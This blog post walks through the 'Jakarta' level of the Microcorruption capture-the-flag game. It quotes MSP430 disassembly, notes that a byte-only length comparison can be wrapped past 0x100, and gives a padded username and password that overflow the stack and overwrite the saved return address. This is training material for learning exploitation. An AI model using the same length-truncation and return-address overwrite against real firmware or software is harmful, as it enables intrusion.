Monday, September 14, 2015

Microcorruption - Jakarta


JAKARTA

Again we see that at the very end of the main sequence we have the following bits of code where 0x22 is added to the stack pointer and then we return to that point indicated by the stack pointer:

4626:  3f40 4245      mov #0x4542 "That password is not correct.", r15
462a:  b012 c846      call #0x46c8 <puts>
462e:  3150 2200      add #0x22, sp
4632:  3b41              pop r11
4634:  3041                   ret


As before we should be able to inject our code, overflow the stack and leave our desired address on the stack. 

Username stored at 0x3ff2
Password stored at <end of username>
Return         stored at 0x4016     - address to return to is 4440 (clears r15 then prog stop)


A username of regular characters that is too long triggers a password too long error.

The length of the username is determined by within puts (0x46c8) and the resulting length is popped into R11.

This is a loop that starts counting at 2401 (temp memory storage) and measures how long the password is.

45ee:  3f40 0124     mov #0x2401, r15
45f2:  1f53           inc r15       < -------
45f4:  cf93 0000      tst.b 0x0(r15)                |
45f8:  fc23           jnz #0x45f2 <login+0x92> ---------
45fa:  3f80 0224      sub #0x2402, r15 total is … ?
45fe:  0f5b           add r11, r15         now add the two together for total length
4600:  7f90 2100    cmp.b #0x21, r15 r15 - #0x21 and set some flags ...
4604:  0628           jnc #0x4612 <login+0xb2> if no carry, jump to fail

but hey, we are just looking at the low end bytes of r15 right? 
cmp.b is the command. Thus our combined length in r15 is either less than 0x00 to 0x20 or like 0x101...

So as a starting plan: fill the space with garbage excepting address space 4016 (which is 35 bytes in from start). The username itself has to be less than 0x20 (32) and the password length combined with the username length has to be 0x101 (257) so the password has to be of length 0xE1 (225) characters.

Let's try the following:
---------------------------------------------------------------------------------
username: aaaaaaaaaabbbbbbbbbbccccccccccdd
password: aaaaLDaaaaaabbbbbbbbbbccccccccccddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhhiiiiiiiiiijjjjjjjjjjaaaaaaaaaabbbbbbbbbbccccccccccddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhhiiiiiiiiiijjjjjjjjjjaaaaaaaaaabbbbbbbbbbcccc


33,836 cycles


But we can recycle our old code to do better cyclewise …
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)